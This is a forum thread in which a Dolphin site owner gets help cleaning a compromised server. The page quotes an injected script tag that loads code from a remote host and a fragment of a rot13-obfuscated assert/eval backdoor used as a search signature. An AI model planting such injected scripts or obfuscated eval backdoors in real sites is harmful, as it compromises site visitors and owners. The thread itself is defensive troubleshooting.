 Hi, I installed and activate exif on my server to test dolphin Trident... but now since i did that my other website on the same server dont show the image that member upload on the dolphin 7.1 website...
it's weird because the avatar still show but not profile photo...
someone got a solution? |
so nobody knows why? |
Not sure of that problem Joe but when I looked at your site, the link to a member profile, it opened an ad site... ManOfTeal.COM a Proud UNA site, six years running strong! |
so i got a virus on my server? I know that sometime a popup open when you click on a link on my website.. but i was thinking is only my because maybe a virus or spyware are on my pc... but you said that you see that too.. so maybe its on the server... |
Yes, you've got the virus. Image isn't shown because when image is displayed, the following code is output: <script type="text/javascript" src="http://online-sale24.com/1.js"></script> which prevent image from showing. I would suggest to change FTP/cPanel passwords immediately, in the future try to not save passwords in FTP client and/or browsers which store password in clear text or using weak encryption. Ask everyone who could have access to the site to check their computers for viruses with the latest Antivirus database. Then clean your site from virus. Rules → http://www.boonex.com/terms |
ok and how can i get rid of this virus on the server? without reinstall everything please ;) |
You need to remove this malicious code from all files. Easier to restore site from the backup. It's better to do it as soon as possible, because you site can be added to blacklist by search engines and anti-viruses, removing the site from these lists isn't easy. ok and how can i get rid of this virus on the server? without reinstall everything please ;)
Rules → http://www.boonex.com/terms |
i dont have a recent backup... how can i find wich files are infected? is there any website antivirus scan software? |
I would suggest to ask hosting support, it maybe that they have some tools for this. i dont have a recent backup... how can i find wich files are infected? is there any website antivirus scan software?
Rules → http://www.boonex.com/terms |
i'm my own hosting service... i got a dedicated server :( |
i'm my own hosting service... i got a dedicated server :( you have 2 options 1. Download the whole site and run a search for string "online-sale24" with a program like fileseek or something similar. 2. You will need to ssh into the server and run this grep -rl "online-sale24" /path/to/dolphin it will list all the files that matches then you can edit them one by one. so much to do.... |
well i try but i found nothing.... i think that the virus is in encoded code... why dolphin dont have a function to check the files to see wich one are modified??? so you can approve those that you modify for a specific mod... and reupload those that you dont modified... many big script got this function to see the integracy of each files. |
Look at the top of your templates _header.html https://www.deanbassett.com |
well i already check in all _header.html and _sub_header.html in both base and the template i use dont find anything :( i think i got a serious hack :( deano i trust you so i can give you the ftp acess by PM to ftp to check if you found something... i also add an antivirus on the server... and he found nothing :( GOD please help me :) |
Send me your info. I will take a look. https://www.deanbassett.com |
Ok. Took a couple of days to find it. https://www.deanbassett.com |
|
Thx you so much!!!!!! |
Hello, To solve such problems the File System Monitor can be very helpful. It can not only notify you if files have been changed but also provide a list of files changed. But of course in order this to happen the module must be installed beforehand. And yes, at this moment you should scan your PC for malware, and then change all access credentials. Also I personally do not recommend to use "save password" feature for any tools (browser, FTP client, etc.) ever. Very often passwords get compromised by stealing from such saved places. Best Regards AntonLV - http://www.boonex.com/market/posts/AntonLV |
Ok i scan and get rid of all virus with malaware software.... change password... and finally get rid of him....but today he come back... can you tell me what you did to get rid of it??? i have to remove it again :( I know i must format my pc because even any antivirus cant find this hacker... so i need some time before be able to format my pc... finish my download... and complete and the open tab in my firefox..... after i will be able to format my pc Ok. Took a couple of days to find it.
|
so should i only search @assert(str_rot13('riny(onfr64_qrpbqr( into all php files on my server or it is a SQL search string i must do? |
The files is the only place i found it. It's best to limit the search to just @assert(str_rot13 https://www.deanbassett.com |
yes i scan for virus, install malaware antivirus and also komodo firewall and antivirus... change password.... but he come back... so i will have to scan again my website... i hope its the same @assert(str_rot13('riny(onfr64_qrpbqr( string he use...... will be more easy to find it :( |
i try to make a search but there is no result now... maybe he change the code line for the hack.... can you tell me wich files was infected... so i will take a look to see the new string he add on my code.... |
I did not keep the files i cleaned, so i do not have an exact list. https://www.deanbassett.com |
